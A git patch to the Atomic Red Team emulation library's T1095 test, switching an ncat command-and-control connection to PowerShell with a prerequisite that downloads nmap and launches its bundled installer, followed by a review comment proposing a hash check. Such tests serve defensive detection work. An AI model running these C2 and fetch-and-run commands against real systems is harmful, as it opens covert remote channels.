From 1854eb9db8a9cde7bf339fbfc4e65532a1db2e1a Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 5 Feb 2020 17:23:40 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
atomics/T1095/T1095.md | 23 +++++++++++++++--------
atomics/index.yaml | 28 +++++++++++++++++++---------
2 files changed, 34 insertions(+), 17 deletions(-)
diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md
index 89b5a2d9..342e4f7b 100644
--- a/atomics/T1095/T1095.md
+++ b/atomics/T1095/T1095.md
@@ -53,26 +53,33 @@ nc -l -p #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| server_ip | The IP address or domain name of the listening server | ip | 127.0.0.1| -| server_port | The port for the C2 connection | port number | 80| +| server_ip | The IP address or domain name of the listening server | string | 127.0.0.1| +| server_port | The port for the C2 connection | integer | 80| +| ncat_exe | The location of ncat.exe | path | $env:TEMP\T1095\nmap-7.80\ncat.exe| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `powershell`! ``` -ncat #{server_ip} #{server_port} +cmd /c #{ncat_exe} #{server_ip} #{server_port} ``` -#### Dependencies: Run with `command_prompt`! -##### Description: Nmap must be installed +#### Dependencies: Run with `PowerShell`! +##### Description: ncat.exe must be available at specified location (#{ncat_exe}) ##### Check Prereq Commands: ``` -ncat -h 2> nul +if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ``` -echo "Install nmap so that ncat.exe will be available for use" +$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" +Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" +Expand-Archive $zippath $parentpath -Force +$unzipPath = Join-Path $parentPath "nmap-7.80" +if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) { + Start-Process (Join-Path $unzipPath "vcredist_x86.exe") +} ``` diff --git a/atomics/index.yaml b/atomics/index.yaml index 1ec2e5c5..340fd324 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml 
@@ -28120,25 +28120,35 @@ command-and-control: device, type the following: \nnc -l -p \n" supported_platforms: - windows - dependency_executor_name: command_prompt + dependency_executor_name: PowerShell dependencies: - - description: Nmap must be installed - prereq_command: ncat -h 2> nul - get_prereq_command: echo "Install nmap so that ncat.exe will be available - for use" + - description: ncat.exe must be available at specified location (#{ncat_exe}) + prereq_command: if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1} + get_prereq_command: |- + $parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parentpath\nmap.zip" + Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile "$zippath" + Expand-Archive $zippath $parentpath -Force + $unzipPath = Join-Path $parentPath "nmap-7.80" + if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | ?{$_.DisplayName -like "Microsoft Visual C++*"}) ) { + Start-Process (Join-Path $unzipPath "vcredist_x86.exe") + } input_arguments: server_ip: description: The IP address or domain name of the listening server - type: ip + type: string default: 127.0.0.1 server_port: description: The port for the C2 connection - type: port number + type: integer default: 80 + ncat_exe: + description: The location of ncat.exe + type: path + default: "$env:TEMP\\T1095\\nmap-7.80\\ncat.exe" executor: - name: command_prompt + name: powershell elevation_required: false - command: 'ncat #{server_ip} #{server_port} + command: 'cmd /c #{ncat_exe} #{server_ip} #{server_port} ' - name: Powercat C2
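Review bot: The new `get_prereq_command` expands the downloaded `nmap.zip` and then launches `vcredist_x86.exe` from inside it without any integrity check on what `Invoke-WebRequest` fetched, so whatever the download returns gets run on the test host. Comparing `Get-FileHash` output against a pinned digest before `Expand-Archive` would close that gap. `Start-Process` is also called without `-Wait`, so the prerequisite step can return before the redistributable has finished installing, and nothing in the visible commands creates `$parentpath` before `-OutFile` writes into it, which likely fails on a host where that directory does not yet exist. The commit subject indicates this file is generated, so the change probably belongs in the source atomic for T1095; the same commands appear in the T1095.md hunk.

```yaml
get_prereq_command: |-
  # … unchanged: $parentpath / $zippath assignment …
  New-Item -ItemType Directory -Path $parentpath -Force | Out-Null
  # … unchanged: Invoke-WebRequest download …
  $expected = "<SHA256_OF_NMAP_7.80_WIN32_ZIP_PLACEHOLDER>"
  if ((Get-FileHash $zippath -Algorithm SHA256).Hash -ne $expected) {
    Write-Error "nmap.zip hash mismatch"; exit 1
  }
  # … unchanged: Expand-Archive, $unzipPath, Visual C++ registry check …
    Start-Process (Join-Path $unzipPath "vcredist_x86.exe") -Wait
```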